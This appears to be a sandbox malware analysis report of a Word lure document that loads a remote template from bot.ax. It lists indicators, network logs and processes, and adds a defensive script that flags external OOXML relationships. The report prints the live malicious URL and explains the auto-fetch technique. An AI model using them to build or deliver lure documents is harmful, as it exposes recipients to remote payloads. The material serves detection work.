Windows Analysis Report
Offer 15492024 15602024.docx.doc

Overview

General Information

Sample name: Offer 15492024 15602024.docx.doc
Analysis ID: 1446728
MD5: 0d0f500d82551e733eab0fb1060a49da
SHA1: 1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
SHA256: d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be
Tags: docdocx

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

AV Detection

Source: Offer 15492024 15602024.docx.doc ReversingLabs: Detection: 13%
Source: unknown HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Directory queried: number of queries: 1006

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: global traffic DNS query: name: bot.ax (5 identical queries)
Source: global traffic TCP traffic (109 per-packet entries collapsed to the six flows they belong to):
Source: global traffic TCP traffic: 192.168.2.22:49165 <-> 104.21.47.128:80 (HTTP; multiple packets in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49166 <-> 172.67.171.37:80 (HTTP; multiple packets in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49167 <-> 172.67.171.37:443 (HTTPS; multiple packets in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49168 <-> 104.21.47.128:80 (HTTP; multiple packets in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49169 <-> 104.21.47.128:443 (HTTPS; multiple packets in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49170 <-> 104.21.47.128:443 (HTTPS; multiple packets in both directions)
Source: Joe Sandbox View IP Address: 172.67.171.37
Source: Joe Sandbox View IP Address: 104.21.47.128
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected (the same request was logged 4 times):
GET /hNZdz HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: bot.ax
Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E279F50C-91EA-4841-A527-8D9534FAEB24}.tmp Jump to behavior
Source: global traffic DNS traffic detected: DNS query: bot.ax
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 23 May 2024 18:41:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
set-cookie: PHPSESSID=ccqb5jblbbpgelnc46rrjjjacs; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWn4AR2JlvSGXIYHhmmkBq4m0b9AN9ruCiuFGW5GrXSo3pf1ytUz5%2F4dXhkqFI2X91%2BaP9fqqSKY%2FAKuo%2FSYodhTojFaZC77pauiNowuecahNqhZ1ofoZWo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88872db6a9cd0f6b-EWR
alt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 23 May 2024 18:41:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
set-cookie: PHPSESSID=8pqa1qkp3733as8k1h92tuc7et; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zg3sDoZsaDlJ2YKgBtWaci3lH8cInlpxk2SYPdK6Pw2WOmshxm%2BqnEe4zHlQKB1chA1TOG7T4qp7l5mPW3u59W1eb4lj4OQHiv%2BtcaMYWFSUprWjrvffodk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88872dded9010dc7-EWR
alt-svc: h3=":443"; ma=86400
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal68.expl.evad.winDOC@18/29@5/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$fer 15492024 15602024.docx.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6BDC.tmp Jump to behavior
Source: Offer 15492024 15602024.docx.doc OLE indicator, Word Document stream: true (reported 11 times)
Source: Offer 15492024 15602024.docx.doc OLE document summary: title field not present or empty (reported 11 times)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Offer 15492024 15602024.docx.doc ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown (13 child processes) Jump to behavior
Source: Offer 15492024 15602024.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Offer 15492024 15602024.docx.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject7.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject6.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject5.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/media/image2.emf
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject4.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/embeddings/oleObject3.bin
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Offer 15492024 15602024.docx.doc Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\bot.ax\DavWWWRoot Jump to behavior
Source: settings.xml.rels Extracted files from sample: http://bot.ax/hnzdz
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
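The two lines above are the static root of everything else in this report: word/_rels/settings.xml.rels carries an external attachedTemplate relationship pointing at http://bot.ax/hnzdz, so Word resolves it on open and, when plain HTTP does not answer with a document, retries the same URL through the WebDAV mini-redirector (hence davhlpr.dll and the \Device\RdpDr\...\bot.ax\DavWWWRoot open). The following script is an added example, not part of the Joe Sandbox report or its tooling: it walks every .rels part in an OOXML package and reports relationships with TargetMode="External". The in-memory sample package it builds is constructed for the demo; the URL http://remote.example/tpl is a placeholder, not an indicator from this analysis.

```python
"""Static check for external relationships in a .docx (remote template / remote OLE).

Added example, not Joe Sandbox code. Scans every *.rels part of the OOXML
package for Relationship elements with TargetMode="External"; an
attachedTemplate relationship of that kind in word/_rels/settings.xml.rels
is the construction the report above shows. The sample package is built in
memory with placeholder contents.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types Word resolves without user interaction when the file
# opens; an External target on one of these means a network fetch, no prompt.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "image", "frame"}


def external_relationships(docx_bytes: bytes) -> list:
    """Return every External relationship found in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in sorted(zf.namelist()):
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": rel.get("Target"),
                    "auto_fetch": rel_type in AUTO_FETCH_TYPES,
                })
    return findings


def has_remote_template(findings: list) -> bool:
    """True when settings.xml points at a template outside the package."""
    return any(f["type"] == "attachedTemplate" and f["part"].endswith("settings.xml.rels")
               for f in findings)


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Constructed minimal .docx for the demo (not the report's sample file).

    With template_url set, word/_rels/settings.xml.rels gets an External
    attachedTemplate relationship; with None every relationship is Internal.
    """
    def rels(entries: list) -> str:
        return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<Relationships xmlns="{PKG_REL_NS}">' + "".join(entries) + "</Relationships>")

    root_rels = rels([f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'])
    doc_rels = rels([f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'])
    settings_rels = rels([
        f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
        f'Target="{template_url}" TargetMode="External"/>'
    ]) if template_url else rels([])
    settings_xml = (f'<w:settings xmlns:w="{WML_NS}" xmlns:r="{OFFICE_REL[:-1]}">'
                    + ('<w:attachedTemplate r:id="rId1"/>' if template_url else "")
                    + "</w:settings>")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{WML_NS}"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass a real .docx path to scan it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx("http://remote.example/tpl")
    for f in external_relationships(data):
        print(f"[{'AUTO-FETCH' if f['auto_fetch'] else 'on-click'}] {f['part']}: {f['type']} -> {f['target']}")
```

Run it against a quarantined copy of the sample and the settings.xml.rels hit should be the first line printed; a document with only Internal relationships prints nothing. The type list is deliberately short: hyperlinks are External too but only fire on click, so they are reported without the AUTO-FETCH flag.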
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (11 times) Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (65 times) Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX
Source: Offer 15492024 15602024.docx.doc Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc Stream path 'CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980428/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980429/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980430/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980431/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980433/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980434/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980435/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr Stream path '_1777980436/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Directory queried: number of queries: 1006